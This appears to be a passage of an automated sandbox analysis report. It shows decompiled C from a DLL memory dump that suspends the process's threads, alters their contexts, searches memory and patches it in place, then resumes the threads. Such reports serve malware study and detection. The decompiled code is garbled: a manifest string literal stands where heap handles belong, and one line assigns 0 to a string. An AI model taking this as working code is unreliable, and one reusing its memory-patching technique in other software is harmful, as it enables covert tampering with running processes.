                                                                                                                        							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
                                                                                                                        							goto L23;
                                                                                                                        						} else {
                                                                                                                        							_t60 = _t55;
                                                                                                                        							do {
                                                                                                                        								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
                                                                                                                        									L19:
                                                                                                                        									_t31 =  *_t60;
                                                                                                                        									if(_t31 == 0) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									goto L20;
                                                                                                                        								}
                                                                                                                        								_t40 = 0;
                                                                                                                        								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
                                                                                                                        									goto L19;
                                                                                                                        								}
                                                                                                                        								_t8 = _t60 + 0xdc; // 0xdc
                                                                                                                        								_t62[4] = _t8;
                                                                                                                        								do {
                                                                                                                        									_t57 =  *(_t62[4]);
                                                                                                                        									if(_t57 == GetCurrentThreadId()) {
                                                                                                                        										goto L17;
                                                                                                                        									}
                                                                                                                        									_t34 =  *_t58;
                                                                                                                        									if(_t34 != 0) {
                                                                                                                        										_t44 = _t58[1];
                                                                                                                        										if(_t58[2] < _t44) {
                                                                                                                        											L16:
                                                                                                                        											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
                                                                                                                        											_t58[2] = _t58[2] + 1;
                                                                                                                        											goto L17;
                                                                                                                        										}
                                                                                                                        										_t52 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
                                                                                                                        										if(_t36 == 0) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										_t58[1] = _t58[1] + _t58[1];
                                                                                                                        										 *_t58 = _t36;
                                                                                                                        										goto L16;
                                                                                                                        									}
                                                                                                                        									_t58[1] = 0x80;
                                                                                                                        									_t53 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        									_t37 = HeapAlloc(_t53, _t34, 0x200);
                                                                                                                        									 *_t58 = _t37;
                                                                                                                        									if(_t37 == 0) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									goto L16;
                                                                                                                        									L17:
                                                                                                                        									_t62[4] = _t62[4] + 0x40;
                                                                                                                        									_t40 = _t40 + 1;
                                                                                                                        								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
                                                                                                                        								_t55 = _t62[5];
                                                                                                                        								goto L19;
                                                                                                                        								L20:
                                                                                                                        								_t60 = _t60 + _t31;
                                                                                                                        							} while (_t60 != 0);
                                                                                                                        							goto L22;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t27;
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6F33B16A
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 6F33B191
                                                                                                                        • VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 494489134-2766056989
                                                                                                                        • Opcode ID: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction ID: 48e3aa18de10c5daafcc2cca0ee42305264480da770c17a9b769614c424a8162
                                                                                                                        • Opcode Fuzzy Hash: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction Fuzzy Hash: F7314D72A04B959FE720CF24C955B6B77E9EB84B18F10841DF9968B280D771F804CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 62%
                                                                                                                        			E6F338400() {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				intOrPtr _v12;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				long _v40;
                                                                                                                        				void _v44;
                                                                                                                        				void* _v48;
                                                                                                                        				intOrPtr _v56;
                                                                                                                        				long _v80;
                                                                                                                        				char _v88;
                                                                                                                        				intOrPtr _v92;
                                                                                                                        				void _v96;
                                                                                                                        				intOrPtr _v100;
                                                                                                                        				intOrPtr _v104;
                                                                                                                        				long _v108;
                                                                                                                        				intOrPtr _v116;
                                                                                                                        				intOrPtr _v128;
                                                                                                                        				long _v132;
                                                                                                                        				long _t26;
                                                                                                                        				long _t28;
                                                                                                                        				long _t30;
                                                                                                                        				void* _t31;
                                                                                                                        				intOrPtr _t32;
                                                                                                                        				intOrPtr _t42;
                                                                                                                        				long _t44;
                                                                                                                        				union _MEMORY_INFORMATION_CLASS _t47;
                                                                                                                        				void* _t49;
                                                                                                                        				intOrPtr _t52;
                                                                                                                        
                                                                                                                        				_t31 = 0;
                                                                                                                        				_v80 = 0;
                                                                                                                        				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80); // executed
                                                                                                                        				if(_v28 <= 0) {
                                                                                                                        					return _t26;
                                                                                                                        				} else {
                                                                                                                        					_t52 = _v12;
                                                                                                                        					_t42 = _v4;
                                                                                                                        					do {
                                                                                                                        						_push(0x1c);
                                                                                                                        						_push( &_v88);
                                                                                                                        						L6F33C2EE();
                                                                                                                        						_t47 = 0;
                                                                                                                        						_v108 = 0;
                                                                                                                        						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
                                                                                                                        						if(_t28 >= 0 && _v128 == 0x1c) {
                                                                                                                        							_t32 = _v116;
                                                                                                                        							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
                                                                                                                        								while(1) {
                                                                                                                        									_t28 = _t47 + _t32;
                                                                                                                        									__imp__RtlCompareMemory(_t52, _t28, _t42);
                                                                                                                        									if(_t28 == _t42) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									_t47 = _t47 + 1;
                                                                                                                        									if(_t47 < _v116 - _t42) {
                                                                                                                        										continue;
                                                                                                                        									}
                                                                                                                        									goto L11;
                                                                                                                        								}
                                                                                                                        								_t44 = _v40;
                                                                                                                        								_t49 = _t47 + _t32;
                                                                                                                        								_v132 = 0;
                                                                                                                        								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132); // executed
                                                                                                                        								_push(_t44);
                                                                                                                        								_push(_t49);
                                                                                                                        								_push(0xffffffff);
                                                                                                                        								L6F33C336();
                                                                                                                        								return _t30;
                                                                                                                        							}
                                                                                                                        							L11:
                                                                                                                        							_t31 = _t32 + _v104;
                                                                                                                        						}
                                                                                                                        					} while (_t31 < _v56);
                                                                                                                        					return _t28;
                                                                                                                        				}
                                                                                                                        			}































                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F338417
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001C), ref: 6F338438
                                                                                                                        • NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6F338453
                                                                                                                        • RtlCompareMemory.NTDLL(?,00000000,?), ref: 6F338496
                                                                                                                        • NtWriteVirtualMemory.NTDLL ref: 6F3384DD
                                                                                                                        • NtFlushInstructionCache.NTDLL ref: 6F3384E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 145697856-0
                                                                                                                        • Opcode ID: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction ID: 0080b3b2eed9b717a3d3651d1a67a4fb6ea759cc3e924ad000adc7748528338a
                                                                                                                        • Opcode Fuzzy Hash: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction Fuzzy Hash: B02191735083A4AFD210DE55DC80EABBBE9EFC47B4F440B1DF59486180C775E5458B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B270(void** _a4) {
                                                                                                                        				void* _t6;
                                                                                                                        				void* _t7;
                                                                                                                        				void** _t13;
                                                                                                                        				signed int _t17;
                                                                                                                        				void* _t20;
                                                                                                                        				void* _t22;
                                                                                                                        
                                                                                                                        				_t13 = _a4;
                                                                                                                        				if( *_t13 != 0) {
                                                                                                                        					_t17 = 0;
                                                                                                                        					if(_t13[2] <= 0) {
                                                                                                                        						L7:
                                                                                                                        						_t7 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        						return HeapFree(_t7, 0,  *_t13);
                                                                                                                        					}
                                                                                                                        					do {
                                                                                                                        						_t20 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
                                                                                                                        						_t22 = _t22 + 0xc;
                                                                                                                        						if(_t20 != 0) {
                                                                                                                        							NtResumeThread(_t20, 0); // executed
                                                                                                                        							NtClose(_t20); // executed
                                                                                                                        						}
                                                                                                                        						_t17 = _t17 + 1;
                                                                                                                        						_t5 =  &(_t13[2]); // 0xc30cc483
                                                                                                                        					} while (_t17 <  *_t5);
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				return _t6;
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,6F33B44C,?,74784970,00000000), ref: 6F33B2BB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33B29E
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B2A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseFreeHeapOpenResume
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3496683721-0
                                                                                                                        • Opcode ID: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction ID: 1110496f906885189f1328f8116ef6c67dc1c1d5a7e4159772a5dde71de7bcf8
                                                                                                                        • Opcode Fuzzy Hash: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction Fuzzy Hash: E9F05E32A41A70AFDB11EA54CC81F5A33A9AB89751F104255F904EF285CB75BC42CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33AFC0(signed int __eax, void* _a4, intOrPtr _a8) {
                                                                                                                        				void* _v0;
                                                                                                                        				long _v536;
                                                                                                                        				intOrPtr _v540;
                                                                                                                        				struct _CONTEXT _v716;
                                                                                                                        				struct _CONTEXT _v720;
                                                                                                                        				void* __edi;
                                                                                                                        				long _t16;
                                                                                                                        				intOrPtr _t19;
                                                                                                                        				long _t20;
                                                                                                                        				signed int _t27;
                                                                                                                        				void* _t30;
                                                                                                                        				intOrPtr _t32;
                                                                                                                        				long _t37;
                                                                                                                        				signed int _t39;
                                                                                                                        				void* _t40;
                                                                                                                        				intOrPtr _t41;
                                                                                                                        
                                                                                                                        				_t41 = _a8;
                                                                                                                        				_t39 = __eax;
                                                                                                                        				_v716 = 0x10001;
                                                                                                                        				_t16 = NtGetContextThread(_a4,  &_v716); // executed
                                                                                                                        				if(_t16 < 0) {
                                                                                                                        					L19:
                                                                                                                        					return _t16;
                                                                                                                        				}
                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                        					_t16 = _t39 + 1;
                                                                                                                        				} else {
                                                                                                                        					_t16 =  *0x6f340958; // 0x0
                                                                                                                        					_t39 = 0;
                                                                                                                        				}
                                                                                                                        				if(_t39 >= _t16) {
                                                                                                                        					goto L19;
                                                                                                                        				} else {
                                                                                                                        					_t27 = _t39 * 0x2c;
                                                                                                                        					_t37 = _v536;
                                                                                                                        					_t40 = _t16 - _t39;
                                                                                                                        					do {
                                                                                                                        						_t32 =  *0x6f340950; // 0x0
                                                                                                                        						_t19 = _t41;
                                                                                                                        						_t30 = _t27 + _t32;
                                                                                                                        						if(_t19 == 0) {
                                                                                                                        							_t20 = 0;
                                                                                                                        						} else {
                                                                                                                        							if(_t19 == 1) {
                                                                                                                        								_t20 = 1;
                                                                                                                        							} else {
                                                                                                                        								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
                                                                                                                        							if(_t20 == 0) {
                                                                                                                        								_t20 = E6F33AF50(_t30, _t37);
                                                                                                                        							} else {
                                                                                                                        								_t20 = E6F33AF90(_t30, _t37);
                                                                                                                        							}
                                                                                                                        							if(_t20 != 0) {
                                                                                                                        								_v536 = _t20;
                                                                                                                        								_t20 = NtSetContextThread(_v0,  &_v720);
                                                                                                                        								_t37 = _v540;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t27 = _t27 + 0x2c;
                                                                                                                        						_t40 = _t40 - 1;
                                                                                                                        					} while (_t40 != 0);
                                                                                                                        					return _t20;
                                                                                                                        				}
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction ID: 59cad453644579db8a67e217b24814fed65208902995dc2cc9b906cd707c02dc
                                                                                                                        • Opcode Fuzzy Hash: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction Fuzzy Hash: C221EE33A087F54BD720DB68C9807AA77D9EB85350F40062AD4B4CB180D735E94587A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B1F0(long** __eax, intOrPtr _a4) {
                                                                                                                        				signed int _v0;
                                                                                                                        				void* __esi;
                                                                                                                        				long _t10;
                                                                                                                        				signed int _t16;
                                                                                                                        				void* _t21;
                                                                                                                        				intOrPtr* _t23;
                                                                                                                        				void* _t24;
                                                                                                                        
                                                                                                                        				_t23 = __eax;
                                                                                                                        				 *__eax = 0;
                                                                                                                        				__eax[1] = 0;
                                                                                                                        				__eax[2] = 0;
                                                                                                                        				_t10 = E6F33B0A0(__eax);
                                                                                                                        				if( *_t23 != 0) {
                                                                                                                        					_t16 = 0;
                                                                                                                        					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
                                                                                                                        						L7:
                                                                                                                        						return _t10;
                                                                                                                        					}
                                                                                                                        					do {
                                                                                                                        						_t10 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
                                                                                                                        						_t21 = _t10;
                                                                                                                        						_t24 = _t24 + 0xc;
                                                                                                                        						if(_t21 != 0) {
                                                                                                                        							NtSuspendThread(_t21, 0); // executed
                                                                                                                        							E6F33AFC0(_v0, _t21, _a4);
                                                                                                                        							_t24 = _t24 + 8;
                                                                                                                        							_t10 = NtClose(_t21);
                                                                                                                        						}
                                                                                                                        						_t16 = _t16 + 1;
                                                                                                                        					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				return _t10;
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                          • Part of subcall function 6F33B0A0: HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6F33B16A
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtSuspendThread.NTDLL(00000000,00000000), ref: 6F33B23B
                                                                                                                          • Part of subcall function 6F33AFC0: NtGetContextThread.NTDLL ref: 6F33AFE6
                                                                                                                          • Part of subcall function 6F33AFC0: NtSetContextThread.NTDLL ref: 6F33B07D
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B253
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1213046356-0
                                                                                                                        • Opcode ID: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction ID: 04efed0e7fd23f17494e9e287c7278ae8680cabaab1548e4dac6af3f4c6b1888
                                                                                                                        • Opcode Fuzzy Hash: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction Fuzzy Hash: 7701FF7A9007659BD320CF14E8C0B6BB3E4AF80709F20462DE9958B280D3B57845CA62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B510() {
                                                                                                                        				void* __edi;
                                                                                                                        				void* _t6;
                                                                                                                        				void* _t11;
                                                                                                                        				void* _t12;
                                                                                                                        				void* _t14;
                                                                                                                        				void* _t17;
                                                                                                                        
                                                                                                                        				E6F33B460();
                                                                                                                        				_t17 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        				if(_t17 == 0) {
                                                                                                                        					_t14 = 2;
                                                                                                                        					goto L4;
                                                                                                                        				} else {
                                                                                                                        					_t14 = E6F33B3A0(0, 0);
                                                                                                                        					if(_t14 != 0) {
                                                                                                                        						L4:
                                                                                                                        						E6F33B4B0();
                                                                                                                        						return _t14;
                                                                                                                        					} else {
                                                                                                                        						E6F33A550();
                                                                                                                        						_t6 =  *0x6f340950; // 0x0
                                                                                                                        						_t11 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        						HeapFree(_t11, 0, _t6);
                                                                                                                        						_t12 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        						HeapDestroy(_t12); // executed
                                                                                                                        						"ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 0;
                                                                                                                        						 *0x6f340950 = 0;
                                                                                                                        						 *0x6f340954 = 0;
                                                                                                                        						 *0x6f340958 = 0;
                                                                                                                        						E6F33B4B0();
                                                                                                                        						return _t14;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B472
                                                                                                                          • Part of subcall function 6F33B460: Sleep.KERNEL32(00000001,00000001,?,00000001,?,?,?,?,?,6F331FE4,00000000,?,?), ref: 6F33B48B
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B497
                                                                                                                          • Part of subcall function 6F33A550: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,6F33B535), ref: 6F33A57A
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 6F33B543
                                                                                                                        • HeapDestroy.KERNELBASE(00000000), ref: 6F33B550
                                                                                                                          • Part of subcall function 6F33B4B0: InterlockedExchange.KERNEL32(6F340620,00000000), ref: 6F33B4B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
